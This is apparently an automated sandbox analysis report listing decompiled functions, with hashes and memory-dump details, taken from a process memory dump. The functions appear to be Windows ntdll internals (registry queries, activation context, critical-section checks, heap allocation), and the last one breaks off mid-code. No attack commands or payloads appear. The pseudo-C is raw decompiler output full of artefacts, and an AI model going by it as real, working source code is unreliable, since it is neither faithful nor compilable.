String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: d8482e5e0890ef25620de3979f1a36a0ce9dbcf6ec48f611a638025912862e3e
Instruction ID: 1b221cd986e3edd68cfbeab01684b3cece89bfe699be89bf5389470ca8e06855
Opcode Fuzzy Hash: d8482e5e0890ef25620de3979f1a36a0ce9dbcf6ec48f611a638025912862e3e
Instruction Fuzzy Hash: A74112B1D0052DABDF219A64CC84FAEB77CEB54718F0445A5EA09EB241DB309F888F95

Uniqueness

Uniqueness Score: -1.00%

Function 018E05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E018E05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E018E07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01859730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E018DA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E018DA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E018E1293(_t79, _v40, E018E07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01837D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E018D138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x018e05c5
0x018e05ca
0x018e05d3
0x018e06db
0x018e06db
0x018e06dd
0x018e06e3
0x018e06e3
0x018e05dd
0x018e05e7
0x018e05f6
0x018e0600
0x018e0607
0x018e0610
0x018e0615
0x018e061a
0x018e061c
0x018e061e
0x018e0624
0x018e0625
0x018e0627
0x018e0628
0x018e0631
0x018e0640
0x018e064d
0x018e0654
0x018e0654
0x018e0631
0x018e066d
0x018e0674
0x00000000
0x00000000
0x018e0692
0x018e069e
0x018e06b0
0x018e06a0
0x018e06a9
0x018e06a9
0x018e06b8
0x018e06d6
0x018e06d6
0x00000000

Strings

`, xrefs: 018E0633

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: cc85bf0f12c37f6b6d400db69a6310e028b9e8d537fc088e6c9c60e9ff0fc647
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: A031063270434A6BE710DE18CC49F977BD9EBC5754F144525FA54DB290D7B0EA04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01893884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01893884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01859650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01834620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01859650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01893893
0x01893896
0x01893899
0x0189389f
0x018938a0
0x018938a4
0x018938a9
0x018938ac
0x018938ad
0x018938ae
0x018938af
0x018938b1
0x018938b4
0x018938bb
0x018938bc
0x018938bd
0x018938c4
0x018938c8
0x018938ca
0x018938ca
0x018938d5
0x0189393e
0x01893940
0x01893942
0x01893952
0x01893954
0x01893961
0x01893961
0x01893967
0x0189396e
0x0189396e
0x01893947
0x0189394c
0x00000000
0x0189394c
0x018938ea
0x018938ee
0x018938f8
0x018938f9
0x018938ff
0x01893900
0x01893902
0x01893903
0x0189390b
0x0189390f
0x01893950
0x00000000
0x01893950
0x01893915
0x0189391d
0x0189391d
0x01893922
0x01893926
0x00000000
0x01893928
0x0189392b
0x0189392b
0x01893935
0x01893937
0x01893937
0x00000000
0x01893935
0x01893926
0x018938f0
0x00000000

Strings

BinaryName, xrefs: 018938B4

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 018b3bd76063087661b36104f75618ab1258912536e74d1b9addcf4e642164f2
Instruction ID: abb8620d18b8b545d6b966150cee93b71c3bf09628437778909fbdd1d7246946
Opcode Fuzzy Hash: 018b3bd76063087661b36104f75618ab1258912536e74d1b9addcf4e642164f2
Instruction Fuzzy Hash: 1831E07290051AAFEF16DA6CC945E7BBBB4FB81B24F194129ED04E7241D7309F00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0184D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0184D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x190d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01834120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0185B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E018598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E018595D0();
					L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0184d29c
0x0184d2a6
0x0184d2b1
0x0184d2b5
0x0184d2b6
0x0184d2bc
0x0184d2bd
0x0184d2be
0x0184d2bf
0x0184d2c2
0x0184d2c4
0x0184d2cc
0x0184d384
0x0184d34b
0x0184d34f
0x0184d350
0x0184d351
0x0184d35c
0x0184d35c
0x0184d2d6
0x0184d2da
0x0184d2e1
0x0184d361
0x0184d369
0x0184d36d
0x0184d2e3
0x0184d2e3
0x0184d2e3
0x0184d2e5
0x0184d2ed
0x0184d2f5
0x0184d2fa
0x0184d302
0x0184d303
0x0184d30b
0x0184d30f
0x0184d313
0x0184d318
0x0184d31c
0x0184d320
0x0184d379
0x0184d37d
0x00000000
0x00000000
0x0188affe
0x0188b001
0x0188b011
0x00000000
0x0184d322
0x0184d322
0x0184d330
0x0184d337
0x0184d35d
0x0184d339
0x0184d33f
0x0184d38c
0x0184d38c
0x0184d33f
0x0184d349
0x00000000
0x0184d349

Strings

@, xrefs: 0184D303

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 20b5042a269d2cdc1905a7952b01ba5ffdfc69cac8e8b9213eaa01cb7abf7f08
Instruction ID: f373ab3f49bb82d0e66a387fb4744236449566adfcd4a8ba355b7e41ff0b4950
Opcode Fuzzy Hash: 20b5042a269d2cdc1905a7952b01ba5ffdfc69cac8e8b9213eaa01cb7abf7f08
Instruction Fuzzy Hash: B33181B1508309DFC311DF68C98095BBBE8EBA5758F040A2EF994C3251EA34DE04CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01821B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01821B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0185BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0185A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0185A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01834620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01821b8f
0x01821b9a
0x01821b9c
0x01821b9e
0x01821ba3
0x01877010
0x01877010
0x00000000
0x01821ba9
0x01821ba9
0x01821bae
0x00000000
0x01821bc5
0x01821bca
0x01821bcf
0x01821bd0
0x01821bd1
0x01821bd2
0x01821bd6
0x01821bdc
0x01821be0
0x01876ffc
0x01877000
0x00000000
0x01877006
0x01877009
0x01877009
0x01821be6
0x01821bec
0x01821c0b
0x01821c0b
0x01821c0c
0x01821c11
0x01821c12
0x01821c15
0x01821c1b
0x01821c1f
0x01821c31
0x01821c33
0x01877026
0x01877026
0x01821c21
0x01821c24
0x01821c24
0x01821bee
0x01821bee
0x01821bf2
0x01821c3a
0x01821bf4
0x01821bf4
0x01821c05
0x01821c05
0x01821c09
0x01821c3e
0x00000000
0x00000000
0x00000000
0x01821c09
0x01821bec
0x01821be0
0x01821bae
0x01821c2e

Strings

WindowsExcludedProcs, xrefs: 01821BC5

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 0b86631995075c0e41741e70ebb81777858194c3fd6697ddc7a23d23aa86c51a
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 4121B37A501639ABDB239A5D8848F5FBBA9EB81B54F254426FE04DB200D630DF40D7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0183F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0183F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0183f71d
0x0183f722
0x0183f726
0x01884770
0x0183f765
0x0183f769
0x0183f769
0x0183f732
0x0188477a
0x00000000
0x0188477a
0x0183f738
0x0183f73a
0x0183f73c
0x0183f73f
0x0183f746
0x0183f778
0x0183f7a9
0x0183f7a9
0x0183f754
0x0183f75a
0x0183f75d
0x0183f75f
0x0183f761
0x0183f76f
0x0183f771
0x0183f771
0x0183f76f
0x0183f763
0x00000000
0x0183f763
0x0183f77d
0x0183f7a3
0x0183f7a5
0x00000000
0x0183f7a5
0x0183f77f
0x0183f782
0x0183f784
0x0183f786
0x00000000
0x00000000
0x00000000
0x0183f788
0x0183f748
0x0183f74d
0x0183f78d
0x0183f793
0x0183f7b7
0x0183f7bc
0x00000000
0x0183f7bc
0x0183f798
0x00000000
0x00000000
0x0183f79d
0x0183f7b0
0x00000000
0x0183f7b0
0x0183f79f
0x00000000
0x0183f74f
0x0183f74f
0x00000000
0x0183f74f

Strings

Actx , xrefs: 0183F73F

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: da23f91631bd168442d91fa847f46a09b621beda4b714a170dba48c9a7739c47
Instruction ID: fb020241d06e029812ac97b51f202c7d16cc87446b5ad0e7f1aa925dabd359f7
Opcode Fuzzy Hash: da23f91631bd168442d91fa847f46a09b621beda4b714a170dba48c9a7739c47
Instruction Fuzzy Hash: D811D035F096868BEB274E1DC490B367695ABC5328F2C453AE765CB391DA74CA0183C3

Uniqueness

Uniqueness Score: -1.00%

Function 018C8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E018C8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x18f0d50);
				E0186D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E018A5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0186DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0186DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0186D130(_t34, _t39, _t40);
			}

0x018c8df1
0x018c8df1
0x018c8df1
0x018c8df1
0x018c8df1
0x018c8df1
0x018c8df3
0x018c8df8
0x018c8dfd
0x018c8e00
0x018c8e0e
0x018c8e2a
0x018c8e36
0x018c8e38
0x018c8e3c
0x018c8e46
0x018c8e46
0x018c8e36
0x018c8e50
0x018c8e56
0x018c8e59
0x018c8e5c
0x018c8e60
0x018c8e67
0x018c8e6d
0x018c8e73
0x018c8e74
0x018c8eb1
0x018c8ebd

Strings

Critical error detected %lx, xrefs: 018C8E21

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 951a8c71cbfe5bcde89b7ab0b74c4eee82f93c785d9ddfd7d6c818d9724291b0
Instruction ID: c963cbed9156c29f064f5f4bb62b6cfd87d1bbd30b2d1e12fc277d2ccff0ba22
Opcode Fuzzy Hash: 951a8c71cbfe5bcde89b7ab0b74c4eee82f93c785d9ddfd7d6c818d9724291b0
Instruction Fuzzy Hash: 21117571E40348DADB25CFE989057ACBBB4AB05714F20421EE168AB282C3348702CF15

Uniqueness

Uniqueness Score: -1.00%

Function 018AFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 018AFF60

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 99e188cf90a2ccf32c4ab11dc0938cd3e1f785eaef186654988ceef0b4518de5
Instruction ID: fce9899d7fadcfa8f7925763b709f9f7d6fdccb1c2374250be23431511ff49e6
Opcode Fuzzy Hash: 99e188cf90a2ccf32c4ab11dc0938cd3e1f785eaef186654988ceef0b4518de5
Instruction Fuzzy Hash: A511E171A10144EFEB26DB58C848F9CBBB5BB08714F558044E608E72A1CB789B40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018E5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E018E5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x18f1178);
				E0186D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E018E4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0185D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E018E5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x19060e8;
								if( *0x19060e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x19060e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01859710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01856DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
